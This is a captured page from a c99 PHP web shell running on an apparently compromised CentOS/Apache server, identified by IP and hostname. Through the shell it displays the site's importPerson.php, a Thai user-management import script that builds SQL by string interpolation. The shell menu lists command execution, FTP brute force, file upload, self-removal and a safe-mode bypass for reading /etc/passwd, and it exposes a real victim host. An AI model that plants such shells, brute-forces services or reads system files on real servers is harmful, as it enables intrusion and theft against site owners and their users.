110.164.51.230 - phpshell

!c99Shell v. 1.0 pre-release build #16!
Software: Apache/2.2.3 (CentOS). PHP/5.1.6 uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44 EDT 2010 i686 uid=48(apache) gid=48(apache) groups=48(apache) Safe-mode: OFF (not secure) /var/www/html/mistk/ums/ drwxr-xr-x Free 52.3 GB of 127.8 GB (40.92%) Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout

!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686

uid=48(apache) gid=48(apache) groups=48(apache)

Safe-mode: OFF (not secure)

/var/www/html/mistk/ums/ drwxr-xr-x
Free 52.3 GB of 127.8 GB (40.92%)
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout

Viewing file: importPerson.php (6.36 KB) -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |

<?
include_once "pagebody.php";
pageHeader();
$pageTitle="№УаўйТўйНБЩЕєШ¤ЕТЎГ";
?>
<table width=100% class="pageTitleBgColor" align="center">
<tr><td align=center><? echo $pageTitle; ?></td></tr>
</table>
<!--your code here-------------------------------------------------------------------------->
<p align=center>
<br>
<table width=70% border=1 cellpadding=3 cellspacing=0 align=center>
<tr bgcolor=#FFFFCC>
	<th>в»ГґНиТ№</th>
</tr>
<tr>
	<td>
	<li>ЎТГ№УаўйТўйНБЩЕєШ¤ЕТЎГ№ХйЁРа»з№ЎТГ№УўйНБЩЕєШ¤ЕТЎГ·ХиЁУа»з№г№ЎТГаўйТКЩиГРєєКТГК№а·ИЁТЎГРєєєШ¤ЕТЎГ аўйТКЩиГРєє UMS бЕР№УўйНБЩЕєШ¤ЕТЎГ·ХиаЎХиВЗўйН§ЎСєГРєє·РаєХВ№аўйТКЩиГРєє·РаєХВ№ 
	<li>ўйНБЩЕўН§єШ¤ЕТЎГ·ХиЁРµйН§ЎУЛ№ґгЛйЎСєєШ¤ЕТЎГ·ШЎ¤№¤ЧН <b>КТВ§Т№</b> бЕР <b>§Т№·ХидґйГСєБНєЛБТВ</b> «Ци§ЁРБХјЕµиНЎТГ№УаўйТўйНБЩЕєШ¤ЕТЎГКЩиГРєє·РаєХВ№бЕР»ГРБЗЕјЕ
	<li>¶йТўйНБЩЕєШ¤ЕТЎГБХНВЩиг№ГРєє UMS бЕР ЁРдБи¶ЩЎ№УаўйТНХЎ
	<li>¶йТµйН§ЎТГЁСґЎТГўйНБЩЕјЩйгЄй ЛГЧНЎУЛ№ґКФ·ёФмЎТГгЄй§Т№ гЛйаЕЧНЎаБ№Щ ўйНБЩЕјЩйгЄй/ўйНБЩЕјЩйгЄй§Т№ГРєє-ЎУЛ№ґКФ·ёФм
	</td>
</tr>
</table>

<form name="form1" method=post>
<table  cellpadding=3 cellspacing=0 align=center>
<tr align=center valign=top><td>
	<table boder align=center>
	<caption align="left"><b>ГРєєєШ¤ЕТЎГ</b></caption>
		<tr><td>Database Server</td><td><input type="text" name="dbHost" value="localhost"></td></tr>
		<tr><td>	Database Name</td><td><input type="text" name="dbName" value=<?=$dbName?>></td></tr>
		<tr><td>	User name</td><td><input type="text" name="dbUserName" value=<?=$dbUserName?>><br></td></tr>
		<tr><td>	Password</td><td><input type="text" name="dbPassword" value=<?=$dbPassword?>><br></td></tr>
	</table>
</td><td>
	<table boder align=center>
	<caption align="left"><b>ГРєєє·РаєХВ№бЕР»ГРБЗЕјЕ</b></caption>
		<tr><td>Database Server</td><td><input type="text" name="dbHostReg" value="localhost"></td></tr>
		<tr><td>	Database Name</td><td><input type="text" name="dbNameReg" value=<?=$dbNameReg?>></td></tr>
		<tr><td>	User name</td><td><input type="text" name="dbUserNameReg" value=<?=$dbUserNameReg?>><br></td></tr>
		<tr><td>	Password</td><td><input type="text" name="dbPasswordReg" value=<?=$dbPasswordReg?>><br></td></tr>
		<tr><td colspan="2" align=center><br><input type="hidden"name="method" value="import"></td></tr>
	</table>
</td></tr>
<tr><td colspan=2 align=center><input type="submit" value="№УаўйТўйНБЩЕєШ¤ЕТЎГ"></td></tr>
</table>
</form>
</p>
<?
if ($method=="import"){
	include_once("clsUser.php");
	include_once("clsUmUser.php");
	include_once("clsPersonT.php");
	include_once("clsOfficer.php");
	$oC = new clsConnection($GLOBALS['HOST'], $GLOBALS['DB'], $GLOBALS['USER'], $GLOBALS['PASSWORD']);
	$oCp = new clsConnection($dbHost, $dbName, $dbUserName, $dbPassword);
	$oCr = new clsConnection($dbHostReg, $dbNameReg, $dbUserNameReg, $dbPasswordReg);
	//$oUs = new clsUser();
	$oUm = new umuser($oC);
	$oPs = new PersonT($oCp);
	$oOf = new Officer($oCr);
	echo "<table width=100% border><tr valign=top><td>";
	$oPs->RSperson();
	$oC->BeginTrans();
	echo "№УаўйТўйНБЩЕЁТЎГРєєєШ¤ЕТЎГ -> UMS";
	echo "<table align=center cellpadding=2 width=100%>\n";
	echo "<tr bgcolor=#CCCCCC><th>#</th><th>єШ¤ЕТЎГ</th><th>ґУа№Ф№ЎТГ</th></tr>\n";
	$i=1;
	while ($oPs->GetRecord()){		//НиТ№·ШЎ¤№ЁТЎ єШ¤ЕТЎГ
		$s = "<tr><td align=center>$i</td><td>$oPs->personCode $oPs->personName</td><td>";
		$i++;
		$oUm->SearchByPsCodeWg($oPs->personId, 4);
		if (!$oUm->GetRecord()){	//¶йТдБиБХг№ um
			$oU->addNewUser($oPs->personId, 
							$oPs->personName, 
							4, -1, 
							$oPs->personCode,
							$oPs->personCode);
			$s.= "<font color=#339900>аѕФиБгЛБи</font> ";
		}else{ //БХг№ um
			if ($oPs->fStatus==1){	//К¶Т№Р НВЩи
				$sql = "update umuser set 
							UsActive=1 
							where UsPsCode='$oPs->personId'";	
				$oC->Execute($sql);
				$s.= "<font color=#0000FF>»ГСє»ГШ§К¶Т№Ра»з№ active</font>";
			}else{ //К¶Т№Р дБиНВЩи   ННЎ  ЎРаКХВ№
				$sql = "update umuser set  
							UsActive=0 
							where UsPsCode='$oPs->personId'";	
				$oC->Execute($sql);
				$s.= "<font color=#666666>»ГСє»ГШ§К¶Т№Ра»з№ No active</font>";
			}
		}
		$s.= "</tr>\n";
		echo $s;
	} //while
	echo "</table>\n";
	echo "<hr><p align=center>»ГСє»ГШ§ўйНБЩЕєШ¤ЕТЎГ<br />аўйТКЩиГРєє UMS аГХВєГйНВ</p><hr>";
	$oC->CommitTrans();

	echo "</td><td>";
	//update to regist а©ѕТРаЁйТЛ№йТ·Хи·ХидґйКФ·ёФмг№ГРєє·РаєХВ№ 
	$oCr->BeginTrans();
	echo "№УаўйТўйНБЩЕЁТЎГРєє UMS -> ГРєє·РаєХВ№";
	echo "<table align=center cellpadding=2 width=100%>\n";
	echo "<tr bgcolor=#CCCCCC><th>#</th><th>єШ¤ЕТЎГ</th></tr>\n";
	$i=1;
	$s="";
	$oUm->RSUserBySt(7);			//¤№·Хи¶ЩЎЎУЛ№ґгЛйБХКФ·ёФмг№ГРєє·РаєХВ№ аЁйТЛ№йТ·Х·и НТЁТГВм
	while($oUm->GetRecord()){
		$oPs->SearchByKey($oUm->UsPsCode);						//get personCode
		$oPs->GetRecord();
		$oOf->SearchByOfficerCode($oPs->personCode);			//ЛТµТБ personCode
		if (!$oOf->GetRecord()){								//ВС§дБиБХг№ГРєє·РаєХВ№
			if ($oPs->assignId==0){
				$s.= "<tr><td align=center>$i</td><td>ВС§дБидґйЎУЛ№ґ <b>§Т№·ХидґйГСєБНєЛБТВ</b> гЛйбЎи $oPs->personCode :: $oPs->fName $oPs->lName</td></tr>";
			}else{
				$oOf->AddNew();
				$oOf->officerCode=$oPs->personCode;
				$oOf->officerPassword=$oUm->UsPassword;
				if ($oPs->assignId==1 or $oPs->assignId==3) {	
					if ($oPs->majortypeId==1)					//КТВКН№ аЄз¤ЁТЎєШ¤ЕТЎГ Majortype.majortypeId
						$oOf->officerType="4";					//НТЁТГВм
					else
						$oOf->officerType="5";					//аЁйТЛ№йТ·Хи
				}
				$oOf->prefixId=$oPs->prefixId;
				$oOf->officerName=$oPs->fName;
				$oOf->officerSurname=$oPs->lName;
				$oOf->officerNameEng="-";
				$oOf->officerSurnameEng="-";
				$oOf->officerEmail="-";
				$oOf->officerStatus="1";
				$oOf->remark="-";
				$oOf->contactAddress="-";
				$oOf->contactPhone="-";
				$oOf->Save();
				$s.= "<tr><td align=center>$i</td><td>Add $oOf->officerCode :: $oOf->officerName $oOf->officerSurname to Regist.</td></tr>";
			}
		}else{				//БХг№ГРєє·РаєХВ№бЕйЗ
			$s.= "<tr><td align=center>$i</td><td>$oOf->officerCode :: $oOf->officerName $oOf->officerSurname already exists.</td></tr>";
		}
		$i++;
	}
	$s.="</table>\n";
	echo $s;
	echo "<hr><p align=center>»ГСє»ГШ§ўйНБЩЕєШ¤ЕТЎГ<br />аўйТКЩиГРєє·РаєХВ№бЕР»ГРБЗЕјЕ аГХВєГйНВ</p><hr>";
	$oCr->CommitTrans();
	echo "</td></tr></table>";
}
?>

<!--------------------------------------------------------------------->
<? 
pageFooter(); 
?>
<!--------------------------------------------------------------------->
<!--put javascript here-->

:: Command execute ::
Enter:	Select:

:: Shadow's tricks :D ::
Useful Commands Warning. Kernel may be alerted using higher levels	Kernel Info:

:: Preddy's tricks :D ::
Php Safe-Mode Bypass (Read Files) File: eg: /etc/passwd	Php Safe-Mode Bypass (List Directories): Dir: eg: /etc/

:: Search ::

:: Upload ::

:: Make Dir ::

:: Make File ::

:: Go Dir ::

:: Go File ::

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0058 ]--